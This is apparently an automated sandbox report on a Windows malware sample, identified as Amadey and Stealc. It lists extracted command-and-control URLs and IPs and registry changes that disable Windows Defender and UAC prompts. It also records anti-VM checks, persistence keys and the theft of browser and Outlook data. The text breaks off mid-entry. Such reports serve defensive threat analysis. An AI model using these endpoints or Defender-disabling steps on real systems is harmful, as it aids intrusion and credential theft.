Analysis
-
max time kernel
55s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 19:31
Static task
static1
Behavioral task
behavioral1
Sample
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe
Resource
win10v2004-20241007-en
General
-
Target
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe
-
Size
1.8MB
-
MD5
82d65703f59b88d8f091de327bbabce4
-
SHA1
07580dac62ef9478a94f1a316616f15c9d0a9f13
-
SHA256
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3
-
SHA512
3471a3a1acb124cce0219d9330b46549a560f0b99dc8e3ca216b449ee4a0e93d3e1f0963e725a143faca932cfc0ba804e7724b836e3c185d6fda39c03d19671f
-
SSDEEP
49152:5BXUShjURElo/e6Lk5PfzHLR4nTsD2g02q2fMypj8xok0gPC/4KPRr6:fX9h/PPfx4nTsigA2f5pj8WXNAKI
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Processes:
a3c615add8.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a3c615add8.exe -
Stealc family
-
Processes:
powershell.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
skotes.exee4e8d8a322.exec1636e04c0.exe32ece984f9.exea3c615add8.exe27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeskotes.exeL.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e4e8d8a322.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c1636e04c0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32ece984f9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a3c615add8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exemshta.exepowershell.exeflow pid Process 50 4540 powershell.exe 51 2180 powershell.exe 54 2608 mshta.exe 61 5244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 6924 powershell.exe 5052 powershell.exe 3420 powershell.exe 6168 powershell.exe 2388 powershell.exe 6068 powershell.exe 2180 powershell.exe 4540 powershell.exe 5244 powershell.exe 2388 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
Processes:
chrome.exechrome.exechrome.exechrome.exepid Process 2280 chrome.exe 6084 chrome.exe 632 chrome.exe 4776 chrome.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeL.exe32ece984f9.exeLB31.exeMig.exeskotes.exea3c615add8.exeskotes.exec1636e04c0.exee4e8d8a322.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32ece984f9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a3c615add8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c1636e04c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32ece984f9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e4e8d8a322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e4e8d8a322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c1636e04c0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a3c615add8.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
skotes.exewscript.exeWScript.exemshta.exe27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe -
Executes dropped EXE 15 IoCs
Processes:
skotes.exeL.exeskotes.exee4e8d8a322.exefile.exec1636e04c0.exe32ece984f9.exefdd7619df5.exea3c615add8.exeFunnyJellyfish.exeFunnyJellyfish.tmpFunnyJellyfish.exeFunnyJellyfish.tmpLB31.exeMig.exepid Process 4960 skotes.exe 3836 L.exe 3564 skotes.exe 1212 e4e8d8a322.exe 4024 file.exe 6980 c1636e04c0.exe 3824 32ece984f9.exe 5900 fdd7619df5.exe 6680 a3c615add8.exe 6728 FunnyJellyfish.exe 6524 FunnyJellyfish.tmp 6984 FunnyJellyfish.exe 5520 FunnyJellyfish.tmp 5788 LB31.exe 6752 Mig.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
a3c615add8.exe27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeskotes.exeL.exeskotes.exee4e8d8a322.exec1636e04c0.exe32ece984f9.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine a3c615add8.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine e4e8d8a322.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine c1636e04c0.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine 32ece984f9.exe -
Loads dropped DLL 2 IoCs
Processes:
regsvr32.exeregsvr32.exepid Process 6768 regsvr32.exe 5540 regsvr32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
a3c615add8.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a3c615add8.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a3c615add8.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
Processes:
RegSvcs.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
skotes.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c1636e04c0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008006001\\c1636e04c0.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32ece984f9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008007001\\32ece984f9.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fdd7619df5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008008001\\fdd7619df5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a3c615add8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1008009001\\a3c615add8.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid Process 4288 powercfg.exe 4320 powercfg.exe 2804 powercfg.exe 1216 powercfg.exe 5696 powercfg.exe 6564 powercfg.exe 6268 powercfg.exe 6088 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/files/0x000300000001e751-6637.dat autoit_exe -
Drops file in System32 directory 1 IoCs
Processes:
LB31.exedescription ioc Process File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exeskotes.exeL.exeskotes.exee4e8d8a322.exec1636e04c0.exe32ece984f9.exea3c615add8.exepid Process 2860 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe 4960 skotes.exe 3836 L.exe 3564 skotes.exe 1212 e4e8d8a322.exe 6980 c1636e04c0.exe 3824 32ece984f9.exe 6680 a3c615add8.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeLB31.exedescription pid Process procid_target PID 4540 set thread context of 2376 4540 powershell.exe 102 PID 5788 set thread context of 6700 5788 LB31.exe 177 -
Drops file in Windows directory 1 IoCs
Processes:
27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exedescription ioc Process File created C:\Windows\Tasks\skotes.job 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 208 sc.exe 6568 sc.exe 6628 sc.exe 472 sc.exe 1300 sc.exe 6632 sc.exe 2600 sc.exe 4012 sc.exe 7016 sc.exe 6524 sc.exe 6204 sc.exe 5560 sc.exe 6224 sc.exe 5488 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 5560 1212 WerFault.exe 93 -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
c1636e04c0.exefdd7619df5.exetaskkill.exetimeout.exeskotes.exetaskkill.exetaskkill.execmd.exeRegSvcs.exeFunnyJellyfish.exeFunnyJellyfish.tmpregsvr32.exe32ece984f9.exeL.exee4e8d8a322.exetaskkill.exetaskkill.exea3c615add8.exeFunnyJellyfish.exeFunnyJellyfish.tmp27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1636e04c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fdd7619df5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32ece984f9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e4e8d8a322.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a3c615add8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 27078da22468bc047da60bdfaf05b18f5d135d27ff58c655e7e9e474ce02e8d3.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exefirefox.exee4e8d8a322.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 e4e8d8a322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString e4e8d8a322.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 5312 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid Process 2764 ipconfig.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 5788 taskkill.exe 5264 taskkill.exe 6424 taskkill.exe 4280 taskkill.exe 5208 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created 